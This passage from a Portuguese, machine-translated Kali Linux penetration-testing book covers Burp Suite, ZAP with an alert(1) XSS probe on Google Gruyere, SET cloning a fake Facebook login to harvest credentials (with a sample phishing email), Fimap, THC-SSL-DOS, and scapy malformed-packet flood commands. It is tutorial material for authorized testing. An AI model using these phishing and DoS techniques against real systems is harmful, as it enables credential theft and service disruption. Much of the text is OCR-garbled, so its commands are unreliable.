navegador para o servidor web. O recurso permite que um verificador da penetração a capacidade de 
examinar uma ligação. O verificador da penetração pode permitir manualmente a conexão com 
continuar uma vez que é visto. 


O Interceptar botão exige a intervenção manual, ou o pedido será 
nunca fazê-lo para o servidor web. 


A próxima configuração é encontrado na Opções submenu. Esta seção 

permitem aos usuários verificar ou alterar a porta padrão em que Burp está em execução, bem como 
configurar a interface de rede ou visto pelo arroto. Por padrão, o arroto é definido para ser executado 
no 

interface de auto-retorno, como mostra a imagem a seguir. A interface loopback é um 

interface especial que geralmente tem o endereço IP do 127.0.0.1 associada com ele. Faz 

não tem uma conexão de hardware físico vinculados a ela, mas é um caminho para a operação 
sistema de referência próprio. Em outras palavras, quando você quer se comunicar com 

-se em rede, você pode usar um auto-retorno. Se você está pensando em testes Arroto Suite 

além da máquina local, você deve adicionar a sua interface Ethernet e endereço IP. 
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Vamos usar a interface de loopback para o nosso exemplo: 


Intercept History. Optons 


Proxy Listeners 


Burp Proxy uses listeners to receive ncorreng HTTP requests from your browser, You wil need te configure your 


Interface Invisible Redirect Certificate 


O próximo passo é configurar o navegador para usar Burp Suite. Todos os navegadores têm 
uma 

de forma semelhante usando um servidor proxy. No próximo exemplo, temos representado o 
definições para configurar um servidor proxy no Firefox: 


Cemmection Settings 
Configure Proxies to Access the Internet 
No proxy 
Auto-detect proxy settings for the network 
Use system proxy setings 


* Manum proxy configuration 


MTTP Proxy | 127.0.0.1 Port 
Use this proxy server for ail protocols 

SS) Proxy Port 
ETP Proxy | Port 
SOCKS Host: Port 


SOCKS va é SOCKS WS 
No Proxy for 


localhost, 127.0.0.1 


Example: mozilsorg netrg,. 192 158.1.0724 


Automatic proxy configuration URL 


Por exemplo a seguir, iremos para um URL, como www.DrChaos.com em 

Firefox. Você vai notar que nada acontece. Isto é porque o Interceptar característica 

é ativado por padrão, como discutimos anteriormente. Agora você pode ver a Interceptar guia em 
Burp mudou as cores para indicar um novo pedido foi interceptada. 
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Quando você clica no Interceptar guia, você vai ver a natureza exata do pedido. 
Agora você pode clicar em Para a frente ou Cair para permitir ou negar o pedido especificamente 
de continuar: 


SET / HTTP/L 

ost: www.drchaos.com 

ser-Agent: Mozilha/5.0 (X11; Linux i686; rvi:18.0) Gecko/20100101 Firefox/18.0 keweasel/18.0.1 
Accept: text/html application/xhtml4ocnl applicationpen!q=0.9,""":q=0.8 
Accept-Language: én-US,en;q=0.5 
Accept-Encoding: gzip, defiste 

cookie: _qca=PO-886080433-1368803092505; __atuvc=3%7C20 


Connection: keep-alive 


Quando você clica no Para a frente botão, você verá o pedido de continuar 

para o servidor, assim como a resposta a partir do servidor. Além disso, você deve ver o 

webpage carregado com êxito no navegador da web. Algumas páginas web têm múltiplas 
componentes, de modo que você pode precisar para selecionar o Para a frente botão várias vezes 
antes 

as cargas de página web. 


Outro recurso interessante é Burp Spider. Arroto Aranha oferece uma forma de mapeamento 
web 

aplicações em uma forma automatizada. Como Burp Aranha obras é que primeiro 
configuração Burp a procuração seu uso da Internet, como tínhamos explicado anteriormente. 
Em seguida, você 

permitir Burp Aranha, e enquanto ele estiver sendo executado, Burp irá mapear todas as 


olicitações f E er f E 7 
E ju À Aigla Arohana paan ef nao pon ção Raros, 


Use these setlingt to mon ter and contro! Bure Spider To begn spalerisg, Becwse to the target a prole atm then rigat 
thoote puder thn host / Branch 


Spider is paused Chaw gumes 


Requests made 
Entes traraterred 
Regani queued 


forms que ses 


“wieder “ope 


~ © Wee vette scope [defined in Taget iad 


_) Wee curar scape 
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Burp mapeia todas as solicitações de visto pelo proxy sob a Alvo guia. Clique no Alvo 
guia para ver o que foi capturado. Haverá uma lista de alvos que estão sendo usados 


no proxy. URLs que estão em cinza significa que você não tenha pesquisado diretamente os 


alvos, enquanto URLs em preto são os locais em que foram explicitamente navegou: 


CO CIC CI Caco CE [Compares Ontos Aw] Ss~SC~*~“‘“CWWCOWOC#C(‘C(N(N(N(NWC*d 
CO 


Puter Hiding not tound tems: hiding C55, maga anc general binary conterá Aiding 4xx responses: hing empty folders 


here 


ney . ver google 
hire sed s Seeds ser « 
hem; ifriendiced cor 

hing / /qetfonyprong org 
AS amp Sta 
hig herms ds 
nte im adeus com 


hitg / (edge quantserve som 
eval nese 


à goegte: ade « 


ser 


Ho 


harp / mama dire haos £ 
hip Dome dr ams £ 
hinge / /wweedrchacs c. 
hits / /wweedreheos t.. 
hip Im dire hens +. 
Mtp / /wwedrchaos < 
hte drum drecho e 
hing) were orchaos.c.. 
hmp //wwa orchans € 
htp //wwmdrthios c. 


cr 
GET 
cer 


Methed | URL 


jabo -me) 

avos co 
teg-nchudes /)s Com. 
(ee corte p egine '. 
imp content) themes) 
(ee contem themen) 
lap comment) themes) 
iwE-<omem, themes) 
imp Comment Themes) 
(ep -COtmen/ themes) 


| Params Statue è) Length 
7 
200 
200 
200 
404 
104 
104 
104 
304 
204 
304 


ese 
ita 
1940 
137 
147 
17 
17 
137 
137 
137 


OCPOONRRC 


MME pe | Tite 


Wma 


stripi 
sengt 


E] HOC OHO A , > 
Reponse 


hmg //piatform twrrer com 
B mos 
Mne dis gravatas com == 
hmp 0 se com Y E 

http / (07 acteithic com Pareme. | Mondery | ‘tox 

B brpe/ /eeture GET / NT7P/3.1 

Mng / secures 1 Hout: emw.dechaos. oom 

User-Agent: Mozilla/%,0 (Macintosh; Intel Mac OS X 10.0; rv:21,.0) 
decra/20106101 Firefox/31.0 

Aoceptr text/henl, application/xhtml+xrl , application/xml ;qe0.9,"/*jq<0.8 
Accept Language: on-W,enjqe0.5 
Accept-Eecoding: gaip, deflate 

Cookie; atuvosS8ICIANICINICISAICINTO IE; 
Cansection: keep-alive 

Cache-Control! max-age=0 


piui googi con 


MW Nr 

how) stanc akfbcdn met 

hmo / (stats sordpiess com 

hing / /Uhemes_g0 opleusercontent com 

het / (twitter tore 

A te; twete cos É a 
qrasPO-20692690098-1770045546315 

Atte jwp me 

(Wie foteboci com 

wem recide cory 


wees tenb rupan 


Para usar o Aranha função, clique com o botão direito em um alvo e selecione Aranha este 
host: 


http I wow facebook. com 
http 
http 


http weve. WS Or 


http.) /wew.dichaos.com/ 
Add to scope 
Spider this host 


wwe recaitcom 
www stumbeuponcom 
i 


| Engagement tools [Pro version only] 
| Compare sitemaps 

Expand branch 

Expand requested items 

Delete host 

Copy URLs inthis host 

Copy links in this host 

Save selected items 


Site map help 
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Quando você vai para o Aranha guia no arroto, você vai notar a Aranha Estado contagem 
mudaram desde Opara um número de acumular: 


Spider Status 


Use these semiags 10 manitor and control Burs Spider. To begia spidering, browse to the touget application, then right cick eme of mace nodes is the target sre map and 
choose Spider this host / branch” 


Spider h runing Char queues | 


Eesuents raio 027 
Bytes transferred: 234532572 
Requests queued. 3,237 


Forms queued q 


Se Burp encontra qualquer forma, ele irá pedir-lhe para preencher os formulários ou ignorá-los. 
Se você preencher os formulários, Burp continuará a ver o que mais ele pode aranha em páginas 
além das formas: 


Burp Spider - Submit Form 


Burp Spider needs your guidance to submit a login form, Please choose the value of each form field which should be used when 
submitting the form, You can control how Burp handles forms in the Spider options tab, 


Action URL: http://www.drchaos.com/wp-login. php 
Method POST 


Type Name 
Checkbox rememberme 
Hidden testcookic 


Submit 
Hidden redirect_to 
Text log 


| Submitform | | Ignore form | 
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Quando o Aranha processo estiver concluído, volte para Alvos guia e encontrar o host que você 
originalmente selecionado para aranha. Clique no triângulo ao lado do anfitrião para expandi-lo. 
Você 

vai ver todos os resultados de aranha sob o seu alvo original: 


» &/ 
» [D 4-reasons-not-to-use-mod security 
` ‘nt-stindard 


+D author 

b fm ASIC WIT! 

> © beef im 

> breach-identified-next-steps 
» 1 breaking-wpa2-psk-with-kali 
byo-destruction 

byod-oper | 

category 


ciscorconie 


oning-ri est 
mb-cloud 
tkir , 
what-does -it-me 
ecting-the-meraki-cioud 
the-movi! parts 
ensuring-your-emails-dont-lead-to-a-majo 
everyone-is -going-mobile 
>» I) feed 
>» 1) foca intro 
> Ga join-mobile-making -your-site-faster 
> EE great-reasons-to-adopt-erp-solut 
H hacking9-magazine-nmap-guide 
> EE 1OW-tO-crack passworas 
> i rov-to -educate-your-emplovees -about-s 
» 1) how-to-hack-and-elevator 
+o prementing-scap-lor-lhe-enterprise 
>» 1 installing-vmware-tools -on-kali-linux 


> [re troducton-to-cioud ketun 
" s cone A Dn demo 


r 
~ 
> 
+ 
» 
o 
r 
> 
ia 
> 
> 
> 
» 
> 
> 


Burp mostra todas as páginas e links que o Aranha processo foi capturado. Além disso, ele 
irá capturar o diretório raiz, estilos de página web, sub-pastas e scripts Java. O 
próximo exemplo mostra várias, sub-pastas capturados no site www.Drchaos.com. 
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Burp tem a capacidade de filtrar os itens usando o cinza Filtro bar no topo da página. 
Quando você clica no Filtro botão, ele vai expandir as opções disponíveis para 
filtrar os resultados: 


O Aranha opção em Burp permite um verificador da penetração da web para ver como a web 
aplicação ou um site é configurado, o que os links são contidos, e para onde 

esses links levam. Uma analogia deste conceito é estar em uma sala com muitas portas 

e tendo a capacidade de explorar cada porta simultaneamente. 


OWASP - ZAP 


ZAP é um fácil de usar, integrado ferramenta teste de penetração para encontrar o 
vulnerabilidades em aplicações web. Nós fornecemos uma breve visão geral de como usar 
ZAP em Capítulo 3 sobre a digitalização de um alvo para possíveis vulnerabilidades. Vamos 
revisitar ZAP para identificação e exploração de cross-site scripting (vulgarmente designado 
como XSS) vulnerabilidades. 


ZAP vem embutido no Kali Linux 1.0, e pode ser encontrado em Sniffing / Spoofing | 
Sniffers Web e selecionando OWASP - ZAP, ou simplesmente abrir uma janela de terminal 
e digitar zap, como mostrado no exemplo a seguir: 


[225] 


Ataques na Web 
Aqui está um resumo da criação de ZAP com o Firefox, como explicado no Capítulo 3: 


1. Aceite o acordo de usuário. 
2. Gerar um certificado SSL ou importar um já existente. 


3. Importe o certificado em um navegador web como o Firefox, vá em 
Preferências |Avançado e selecionando a Criptografia sub-seção. 


4. Clique em Exibir Certificados e importar o certificado. 
5. Confira todas as opções de confiança para o uso do novo certificado. 


6. Configure seu navegador de Internet para usar ZAP como o proxy padrão. No Firefox, 
isso é encontrado em Preferências |Avançado |Rede. 


7. Digite o servidor proxy localhost eo número da porta 8080, Que é o 
padrão para o proxy ZAP. 


8. Marque a caixa para usar o servidor proxy para todos os protocolos. 


” 


GS Vocé vai precisar para gerar um certificado antes de poder usar ZAP. 


Uma vez ZAP e Firefox são configurados, carregar qualquer URL no Firefox. Você vai ver o 
sites agora estão aparecendo na ZAP sob o Sites guia. Neste exemplo, nós fomos 

para www.DrChaos.com e percebi que temos muito poucos sites que foram carregados porque 
de todos os links na www.DrChaos.com página: 


= © hmp://s.gravatar.com 

= PP imp://sO wp.com 

= Pimp://s7.addthis.com 

= mmp:fisegment-pixel.invitemedia.( 
PP mp//stats wordpress.com 

= F http: //tacoda.at.atwola.com 


= tp: //themes.googleusercontent.c 


2» http: //tracking. hostgator.com 
o M http://www.drchaos.com 
_. M http://www. facebook.com 
_— © https: //apts.qoogle.com 

_— © https: //platform.twitter.com 


= 


ZAP tem a opção de executar scanners ativos ou passivos. Scans passivos não executar 
ataques e deve ser seguro para ser executado em qualquer aplicação web. Varreduras ativas 
executado um número 

de ataques e estão funcionando ativamente códigos contra aplicações web, o que pode 
disparar alarmes para determinados produtos de defesa de segurança. 


[226] 


Capítulo 6 


O exemplo a seguir estará usando ambos os scans ativa e passiva. É uma boa idéia 

ter um servidor web que você pode testar em vez de tentar ZAP em um não autorizado 
servidor. Porque queremos praticar em um servidor web vulnerável estamos autorizados 
para o teste, vamos voltar a usar o Google Gyuyere projeto. 


Google criou o projeto Gruyere como um meio para testar exploits aplicação web 

e defesas. site O projeto Gyuyere tem várias vulnerabilidades embutidos 

para ele, incluindo XSS. Você pode executar o seu próprio projeto de Gruyere on-line, ou você 
pode 

transferi-lo para uma máquina local para o seu teste: 


Web Application Exploits and Defenses 


A Cocelad by Bruce Leben, Mugdha Bendre, and Parisa Tabriz 


Crie a sua propria instancia de Gruyere para testar ZAP. Quando vocé fizer isso vocé vai ser dada 
seu próprio URL único. Foi-nos dada http://google-gruyere.appspot. 
com/326352883334 / para o nosso URL. 


Nos vamos voltar a ZAP e fazer uma varredura rapida deste URL: 


| E Quick sran | => Reques! e Response C Break 
Welcome to the OWASP Zed Attack Proxy (ZAP) 


ZAP is an easy to use integrated penetradon testing tool for finding vulnerabilities in web applica 
Please be aware that you should only attack applications that you have been specifically been giv 


To quickly test an application, ester its URL below and press “Attack 


URL to amack hero: | /Qoogle-gruyere apos pot com, 326352883334, 
y Attack 5 


Progress Attack complete - see the Alerts tab for details of any issues found 


for a more im depth test you should explore your apple ation using your browser or automated re 


= History \ Search MM Break Points PE Alerts À Active Scan ETA 4 Forced Browse O Furze Params + 


n s 1008 Ciment Scans O | Utis found 71 


Fiss 

AGa ogie -g uyt e appapor i 526352843354) edape oe gr SEEL 

btta | (quegis-grupere aprsgos cr ojo “In 

(go 0g leg upele apps pot < semana pet] tan pper sro 
(goog len uyere apospor co 

(goog lee upete aprspot curr/3161528 


aquoso) SEL 


4 
4 
4 
4 


Sebre poe action= updatedcolr=ZAMiced= ZA SEED 


(qa og le-g upes apprgot cr HIS VIZRATI DA 
“TS | (eews proge com (ews search gebite OUT OF SCOM 
$ | (O09 Upete appi pot com S24 552043354) pepe. puts hetita 
fenages google com) images "a ~cheddarS tera OUT 0 _SCOrt 
iu ogle-gruçere aprsgo cores 376 152883134) pippet- quis 
qooqgie-pruçere appa pon cory 3263520833 04 TAP 
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O exemplo a imagem mostra um grupo de SEED arquivos, incluindo um que é 
curiosamente rotulada: http://google-gruyere.appspot.com/326352883334/ 


inválido. 


Quando colocamos isso em um navegador, obtemos a seguinte mensagem de erro: 


Home 


Quando se trata de XSS, os personagens mais perigosos são uma URL <e >. Se um 

hacker pode obter um aplicativo para inserir o que eles querem em uma página usando <e > 
diretamente, que abre uma porta para injetar scripts maliciosos. Aqui estão alguns outros 
interessante SEED arquivos: 


Invalid request: >< 


| google-gruyere.appspot.com/ 3276352583334 Gohan 


C | google-gruyere appspot.com/326352881334/%26gt; X26)! 


Invalid request: >< 
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Aqui está um exemplo de tirar proveito de um desses SEED links por injeção de um 
script. Vamos criar um URL e adicione o alert (1) script para ver se o site vai 
criar um erro de pop-up: 


http://google-gruyere.appspot.com/326352883334/ 
alerta <script> (1); 
</ Script> 


O exemplo mostra o nosso problema de servidor de aplicação web alvo uma prova de contexto 
que 

este site é vulnerável a um ataque. Podemos usar ZAP para repetir o ataque, tente outro 
ataques ou métodos de ensaio XSS similares. 


Recomendamos a brincar com os erros que você encontrar e ver se você pode manipular 

-los para gerar uma saída sensível para seus exercícios de testes de penetração. O Gruyere 

projeto é uma ótima maneira de testar suas habilidades de encontrar outras vulnerabilidades usando 
ZAP. 


Para se defender contra ataques remotos, ZAP pode ser ótimo para testes de vulnerabilidades web, 
tais 

como ataques XSS. Algumas pessoas acreditam que os usuários não precisam se preocupar com 
XSS 

quando navegar em sites se o navegador anuncia que tem capacidades de defesa XSS. 

A verdade por trás desse conceito é que a confiança na proteção do navegador não pode ser perfeito, 
com base 

no princípio de que os navegadores não estão cientes de quão seguro o código está por trás da 
aplicação web. Hackers inteligentes pode ser capaz de contornar essa proteção, tais como 
explorando uma vulnerabilidade de XSS e emitir os scripts contra as forças que visitam o site. 
Melhores práticas para proteger seu servidor e os clientes acessar seus aplicativos é 

identificando e corrigindo vulnerabilidades usando uma ferramenta como o ZAP. 
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Colheita senha SET 


Foram examinados os fundamentos da Engenharia Social Toolkit (SET) em Capítulo 4. Estamos 
vai revisitar SET e olhar para alguns conceitos avançados de colheita e senha 
captura de informações privilegiadas. 


Como um lembrete, vamos lançar SET, indo para Ferramentas de Exploração |Social 
Ferramentas de engenharia |se-toolkit. 


Certifique-se SET é atualizado se isso se a primeira vez de usá-lo. Passos para atualizar SET 
e verificar se GIT está instalado pode ser encontrada em Capítulo 4. 


que quem está sendo alvo é capaz de conectar ao seu servidor web. 
Isto significa que qualquer ataque baseado na Internet terá de alavancar um público 
Endereço IP (ou através de NAT ou directamente sobre Kali Linux), bem como 


Quando SET clones de um site, ele irá executar um servidor web. É importante 
a! `) 
\ na 
* abertura de regras de firewall para permitir o acesso a Kali de um local remoto. 


Depois de ter tomado o cuidado de todas as configurações de IP, é hora de lançar SET: 


Vamos agora usar SET para colher senhas. SET tem a capacidade de clonar qualquer site 

você quer. Estamos realmente indo para escolher um dos engenharia social mais popular 

sites neste exemplo clonar. Concordar em qualquer contrato de licença que você pode se deparar 
com SET: 
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root@kall; ~ 


Edit View Search Terminal hi 


he Social-Engineer Toolkit is provided as is 
application 


ch mae, market, do whatever! 
credit where credit 
p . he authors the credit 
y using this software, if you eve 
“, you should give him 


| q q q q q qual qu A m g 
» SOC( is Author 


to refuse the hug or the beer. 


Selecionando a opção 5 é recomendado para atualizar SET antes de usar a ferrament 
para garantir que você tenha as últimas atualizações. Se você receber um erro informano 


não 
a Existem repositórios Git, você pode ter instalado GIT incorretamente ou o 
Ñ passos mudaram desde a escrita deste texto. Consulte a editora de 


D site, blog do Aamir Lakhani em www.DrChaos.com ou José Muniz de 
blog em www.thesecurityblogger.com para mais truques sobre como usar SET 
Kali com Linux. 


1. Uma vez que SET é atualizado, selecione a opção 1 para ataques de engenharia 


5° dalscione a opção 2 para Vetores de Ataque Site 


3. Selecione a opção 3 para Credencial Harvester Ataque 


Você tem algumas opções de como você deseja clonar um site. SET tem modelos para 
sites populares, como Facebook e Gmail. As vezes, esses modelos não funcionam; 

no entanto, é recomendável começar com estes ou clonagem de outro site. Para clone 
um site, você precisa de um URL, e SET irá automaticamente tentar cloná-lo. 


Se você já tiver um site clonado ou se os arquivos HTML carregado no Kali, você pode 
selecionar importação personalizada. Ao selecionar esta opção, você precisa dizer onde Kali 
os arquivos HTML estão localizados no sistema de arquivos local. 
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Para o nosso exemplo, vamos escolher modelos de web. SET vai perguntar sobre o endereço IP 
deve escutar. Este será o endereço IP para a interface em Kali Linux. O 

exceção a isso é quando se usa NAT em um firewall. Nesse caso, você vai precisar usar 

o NAT ou o endereço público, em vez de endereço IP na Kali Linux para que as metas podem 
acessar o sistema. O próximo exemplo usará o endereço de loopback local 127.0.0.1. 


Em seguida, SET vai pedir para selecionar um modelo. Para este exemplo, vamos selecionar 
Facebook. 

O próximo exemplo mostra um navegador indo para 127.0.0.1 e exibindo o nosso falso 
Facebook page. Se uma página modelo não parece muito bem, você pode querer usar um 
diferente modelo ou clonar a página desejada: 


Wetoomne to Pacebeak ~ Log in. Sign Up or Learn More ~ kewenset 


fis Edt Yew ftgters Soctmaks Tes tice 


Bh Wi et eee a Lang by Le 


~v ion -E E- 


Bhesa” fonse Secrecy Air AO GEspisr-DE Aran- 


onnect with friends and the 
orld around you on Facebook. 


See photos and updates 


aro whati nes q 


Observe nossa estados barra de endereço 127.0.0.1. Normalmente, você precisará usar algum outro 
vetor de ataque para enganar os usuários para ir para o seu site. Há inúmeras maneiras de fazer isso, 
como enviar-lhes um link ou um e-mail falso: 


Facebook <wwt. secmob A gmail.com> 


ni xÀ | At COT> 


Facebook 


Dear Facebook user, 

h an effort to make you online exparence saler and more enoyabia, Facebook will be Implamenting 8 
new login system that will affect all Facebook users. These changes will ofer new features and 
mcreased account security 

Before you are able to use the new login system, you wil be required to update your account 

Please click an fre link below to update your account online now 


www fycebook com 


E you have any questions, reference oul New User guide 


Thanks, 
Tha Facebook Team 


Facebook will never ask you for your password in an email or Facebook message. Laam more about 
how to keep your account secure. 
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Quando entramos em nosso nome de usuário no site falso Facebook, SET captura o tráfego. 
SET também irá redirecionar os usuários para o site real. A esperança é que as vítimas serão 
acredito que eles entraram na sua senha incorreta quando redirecionado para o real e Facebook 
continuar usando Facebook sem saber que SET capturado suas credenciais de login: 


root@kali: ~ 


O exemplo anterior mostra SET havia capturado o nosso nome de usuário: DrChaos, e nossa 
Senha como ILovekKali. 


Quando tiver concluído este exercício, pressione Ctrl + C para sair da ferramenta SET e 
gerar um relatório HTML. SET cria um relatório profissional que pode ser utilizado em 
seu teste de penetração relata: 
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Fimap 


Fimap é uma ferramenta Python que pode encontrar, preparar, auditoria, explorar e Google 
automaticamente 

para o arquivo local e remoto Inclusão (LFI e RFI) bugs em aplicações web. 

Fimap pode ser encontrado em Aplicações Web |Scanners de Vulnerabilidade Web | 
Fimap. Quando você abre Fimap, uma janela de terminal abre exibindo a casa 

tela. Fimap tem algumas opções do plugin, que você pode baixar usando a 

seguinte comando: 


Fimap - install-plugins 


Todos os plugins disponíveis serão exibidos como uma lista, com a opção de escolher um para 
instalar 

ou então sair. No exemplo a seguir, há dois plugins disponíveis para instalar. Você 

terá que executar o comando instalar duas vezes para instalar cada plugin individualmente: 


# tinap insta 
99 (For tt Swart 


matic LFI/RFI scanner and ex 
an Karim ( fimap.dev@gmail 


Requesting list of plugins 
henpipap pai Mim o O. 
REPEERERESEHHASAEROAREBE HAAR nara 
@LIST OF TRUSTED PLUGINS 
8 
a aat anea EEE EEE tt at a at a ane a RR ese e edre Dra pre a arroa dom erp o eara a ae 
PAUGURU aE a Pe a aa aaa a 
njector by Darren “Infodox" Martyn «inf 


HSH HHH ASS RAKE 
3 plugin to install 


Para usar Fimap, primeiro você precisa determinar o seu alvo, especificando a URL. La 

são opções para especificar uma URL, uma lista de URLs usando o Google para adquirir URLs, ou 
outro 

métodos, como URLs de colheita de outras URLs, bem como olhar para as formas e 

cabeçalhos. Por exemplo, o seguinte, vamos direcionar www.thesecurityblogger.com. 
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Para digitalizar thesecurityblogger.com site, digite o seguinte comando: 


Fimap-u 'http://wwwthesecurityblogger.com' 


Fimap tentará identificar as vulnerabilidades de inclusão de arquivos. A sequência 
exemplo mostra que o nosso objectivo não é vulnerável a um ataque de inclusão de arquivos: 


piv, LhesecuritybLogger.com/?p=24/5 


Negação de Serviços (DoS) 


Normalmente, um exercício de teste de penetração é focada em identificar as lacunas na 

segurança, em vez de prejudicar o sistema. Esta é uma característica chave que separa uma 
verdadeira 

atacante de um verificador da penetração autorizado. Hackers de verdade não seguem as regras 

e não estão preocupados com a interrupção de negócios, se ele pode melhorar a sua situação. 

Em alguns casos, um hacker está olhando para criar qualquer tipo de impacto negativo sobre um alvo, 
incluindo derrubar sistemas críticos. Por esta razão, faz todo o sentido, em alguns casos 

para testar sistemas para o risco de Denial of Service (DoS) tipo ataques. Isto é vulgarmente 
denominado como testes de estresse de seus serviços voltado para a Internet. 


vulnerabilidades. Alguns métodos de ataque pode ter um impacto negativo para 
um sistema de teste pós-penetração. Aconselha-se a testar contra redundante 


É absolutamente fundamental ter uma aprovação para testar um trunfo para DoS 
7 Taa Á 
j sistemas, equipamentos de laboratório, ou sistemas de não-produção, se possível. 


O ataque mais comum envolve DoS inundando um alvo com a comunicação externa 

pedidos. Essa sobrecarga impede o recurso de responder ao tráfego legítimo, 

ou retarda a sua resposta de forma tão significativa que ele é processado indisponíveis. Ataques DoS 
pode direcionar os recursos do sistema (IE espaço em disco, largura de banda, e assim por diante), a 
configuração 

informação (ou seja, remover tabelas de rotas), informações sobre o estado (o restabelecimento 
sessão TCP), ou 

qualquer coisa que possa prejudicar o funcionamento do sistema. 


um DDoS 


> A diferença entre um e DoS Negação de serviço distribuída 
GS (DDoS) é que um ataque de negação de serviço envolve uma maquina enquanto 
ataque envolve muitos. DDoS está fora do escopo deste texto. 
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Existem quatro categorias principais de ataque DoS / DDoS: 


e Desconto Baseado Ataques: Trata-se de enchentes, inundações UDP ICMP, e outros 
inundações baseadas em pacotes falsificados. O propósito é o de saturar a largura de 
banda de 
website da vítima. 

e Os ataques de protocolo: Ele consome recursos de servidores ou intermediário 
equipamentos de comunicação, tais como roteadores, firewalls, balanceadores de 
carga, 

e assim por diante. Exemplos disso são as inundações SYN, Ping da morte, Smurf, 
Teardrop, 

* Akies (Ceymetdatto Apiesa: poe diardeeita o tráfego legítimo para travar a web 
serviço. Os exemplos incluem ataques de dia zero, a exploração da vulnerabilidade, 
e assim por diante. 


e Sessão de Exaustão: Abusando limitações sessão, estabelecendo repetidamente 
mas não fechando novas sessões com o objetivo de consumir recursos. 


Kali Linux contém várias ferramentas de exploração de vulnerabilidade abordados no anterior 
capítulos que podem ser usados para a camada de aplicação ataques DoS como Metasploit. 

Além disso, Capítulo 3 cobria uma ferramenta popular scapy Protocolo DoS. Aqui estão mais algumas 
ferramentas 

disponível em Kali Linux para realizar ataques DoS: 


E Para testar DoS, você pode usar www.upordown.org para ver se 
N um site está disponível. 
Ú 


down for everyone or just me? 


THC-SSL-DOS 


O Secure Socket Layer (SSL) é usado para proteger as conexões e 

transações através da Internet. Estabelecendo uma conexão segura SSL requer de 15x 

mais poder de processamento no servidor do cliente. THC-SSL-DOS explora este 

propriedade assimétrica por sobrecarregar o servidor até que ele é incapaz de fornecer qualquer 
serviço a usuários legítimos. O ataque explora o recurso de re-negociação segura SSL 

para disparar milhares de renegociações usando uma única conexão TCP. Isto é conhecido 
como SSL-Exaustão ataque. A vantagem desta abordagem é que a transformação 

capacidade de apertos de mão SSL é muito superior no lado do cliente, o que significa que um comum 
laptop através de uma conexão de rede média pode desafiar um servidor de aplicativos web. 
Esta é uma vulnerabilidade conhecida, e não existe solução real para remediar este a partir do 
escrita deste texto. 
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Para acessar THC-SSL-DOS, navegue até Teste de Estresse |Teste Web Stress |THC-SSL- 
dos. Isso fará com que uma janela do terminal com a página inicial para THC-SSL-DOS. Para 
executar THC-SSL-DOS contra um alvo, o tipo t: 


THC-SSL-dos [opções] <ip do <port> victim> e - aceitar 


eepti-optior-that-the FP -15-3-Tegitimate target 


Você deve incluir - Aceitar ou você receberá a seguinte mensagem de erro: 
E [= £ 
ed to perform the test against this target 


Uma vez THC-SSL-DOS é executado, você verá alguns palavreado engraçado informando que é 
iniciar o processo de aperto de mão e que está sendo explorado. Na imagem seguinte, 

vamos mostrar um site que não alavancar SSL, portanto mostrando erros de conexão. 

A segunda imagem mostra os apertos de mão bem-sucedidas, o que acabará 

DoS o alvo. Lembre-se, você só deve tentar isso em IPs e sites você 

tem permissão para testar. Estes ataques podem danificar severamente um web site ou 
aplicação web: 


ckersche 
Greetingz: the franch underground 


Waiting for script kiddies to piss 
The force is with those who 
Handshakes BD [8.66 h/s), 1 Com, 
Handshakes © [8 fs], 3 Conn) 
SSL: error:14077GFC:SS outirs 
#10: Thi 


Waiting for script kiddies to piss off...,.... 
The force às with those who read the source.. 
Handshakes O [0,00 h/5], 1 Conn, D Eri 


Handshekes 13 [6 5s], 10 Conn, O Err 
Handshakes 180 [If 27 S 9 Conn. O Err 
] 34 Connv O Eri 
Conn, O Err 
Conn, O Err 
Conn, O Eri 
987 [144,95 S 54 Conn, O Err 
Hands os 1138 [151.00 h/s AQ Conn, O Err 
Handshakes 1296 [157.78 h/s] 3 Conn, O Err 
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Scapy 


Uma das ferramentas mais populares é DoS scapy. Scapy é uma ferramenta de manipulação de 
pacotes para 

redes de computadores, escrito em Python por Philippe Biondi. Scapy pode forjar ou decodificar 
pacotes, enviá-los no fio, capturá-los, e as solicitações e as respostas de jogo. Além disso, 

ele pode lidar com tarefas como digitalização, tracerouting, sondagem, testes de unidade, ataques, e 
a descoberta de rede. 


Um truque comum é manipular pacotes TCP do Kali e enviá-lo via scapy. 
Para iniciar scapy, tipo scapy na janela do terminal. Uma vez scapy foi lançado, 
digitar sintaxe de comando: 


:-É scapy 


INFO: Can't import python gnuplot wrap . Won't be abl 
WARNING; No route found tor IPv6 destination :: (no 


y s 


Welcome to Scapy (2.2.0) 


Nesta tela a seguir, vamos usar scapy para enviar TCP malformado 

pacotes para o nosso servidor de teste. Neste caso de uso, o nosso servidor de teste é 10.0.0.1. Este 
pode ser um 

roteador ou um servidor web. Também, vamos especificar o número de pacotes que serão 

enviar para o nosso destino. Neste caso estamos enviando 2000 pacotes usando o comando: 


enviar (IP (dst = "10.0.0.1", ttl = 0) / TCP (), iface = "eth0”, count = 2000) 


Na linha de comando anterior, estamos enviando 2000 pacotes a partir de nossa eth0 interface 

em nosso servidor Kali para o endereço de destino 10.0.0.1. Além disso, estamos enviando 

o alvo de um tempo para viver valor de 0. Isso é muito bonito impossível de um TCP 

ponto de vista. Essencialmente, estamos tentando confundir o servidor web com um mau TTL 
valor. Atacantes na vida real mandar milhões desses pacotes. Deve notar-se que um 

sistema sob as circunstâncias corretas pode falhar ou se tornar corruptos de uma única má 

ou pacote malformado. Podemos ajustar a contagem ou outros parâmetros que podem precisar de 
para o nosso ataque: 


= scap) 

a J 
INFO: Can't import syTNon anup Llo dp j b Wor t Dê ib e ti 
WARNING: Ni te f for IPvé stination :: (no default 


WOLC{ 


Aqui estão alguns outros cenários de ataque populares usados por scapy: 
Bad IP versão 


enviar (IP (dst = "10.0.0.1", sre = "10.20.30.40", versão = 0) / 
TCP (dport = "www"), iface = "eth0", count = 2000) 
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Bad TCP checksum 
enviar (IP (dst = "10.0.0.1") / TCP (chksum = 0x5555), iface = "eth0”, count = 2000) 
Bad TCP Flags (tudo esclarecido e SEQ # == 0) 


enviar (IP (dst = "10.0.0.1") / TCP (flags = "", seq = 555), iface = "eth0”, 
count = 2000) 


Bandeiras Bad TCP (All Flags Set) 

enviar (IP (dst = "10.0.0.1") / TCP (flags = OxOff), iface = "ethO", count = 2000) 
FIN único conjunto 

enviar (IP (dst = "10.0.0.1") / TCP (flags = "F"), iface = "ethO", count = 2000) 
Length> L2 Comprimento 


enviar (IP (dst = "10.0.0.1", sre = "10.20.30.40", o DIH = 15L) / TCP (dport = "www"), 
iface = "ethO", count = 2000) 


Comprimento Header Too Short 


enviar (IP (dst = "10.0.0.1", sre = "10.20.30.40", o DIH = 2L) / TCP (dport = "www"), 
iface = "ethO", count = 2000) 


